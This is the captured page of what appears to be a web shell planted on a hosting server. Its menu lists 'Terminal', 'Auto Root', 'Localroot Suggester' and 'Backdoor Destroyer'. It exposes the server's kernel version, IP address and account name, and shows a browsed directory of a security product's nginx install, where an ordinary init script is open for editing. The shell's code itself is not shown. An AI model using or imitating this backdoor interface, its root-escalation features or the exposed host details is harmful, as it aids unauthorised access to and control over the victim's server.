Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpguard /
cpg-nginx /
Delete
Unzip
Name
Size
Permission
Date
Action
client_body_temp
[ DIR ]
drwx------
2025-09-25 07:52
conf
[ DIR ]
drwxr-xr-x
2025-09-25 07:51
fastcgi_temp
[ DIR ]
drwx------
2025-09-25 07:52
html
[ DIR ]
drwxr-xr-x
2025-09-25 07:51
logs
[ DIR ]
drwxr-xr-x
2025-09-25 07:52
proxy_temp
[ DIR ]
drwx------
2025-09-25 07:52
sbin
[ DIR ]
drwxr-xr-x
2025-09-25 07:51
scgi_temp
[ DIR ]
drwx------
2025-09-25 07:52
ssl
[ DIR ]
drwxr-xr-x
2025-09-25 07:51
uwsgi_temp
[ DIR ]
drwx------
2025-09-25 07:52
nginx.lock
0
B
-rw-r--r--
2025-10-13 05:40
nginx.pid
6
B
-rw-r--r--
2025-10-13 05:40
nginx_daemon.sh
990
B
-rwxr-xr-x
2023-02-22 07:22
Save
Rename
#!/bin/sh # # Source function library. #. /etc/rc.d/init.d/functions # Source networking configuration. #. /etc/sysconfig/network nginx="/opt/cpguard/cpg-nginx/sbin/nginx" prog=$nginx lockfile="/opt/cpguard/cpg-nginx/nginx.lock" pidfile="/opt/cpguard/cpg-nginx/nginx.pid" NGINX_CONF_FILE="/opt/cpguard/cpg-nginx/conf/nginx.conf" start() { [ -x $nginx ] || exit 5 [ -f $NGINX_CONF_FILE ] || exit 6 echo -n $"Starting $prog: " $nginx -c $NGINX_CONF_FILE retval=$? echo [ $retval -eq 0 ] && touch $lockfile return $retval } stop() { echo -n $"Stopping $prog: " kill -9 `ps aux | grep 'nginx:' | grep cpguard | tr -s " " | cut -d " " -f 2` retval=$? echo [ $retval -eq 0 ] && rm -f $lockfile return $retval } restart() { stop start } case "$1" in start) $1 ;; stop) $1 ;; restart) $1 ;; *) echo $"Usage: $0 {start|stop|restart}" exit 2 esac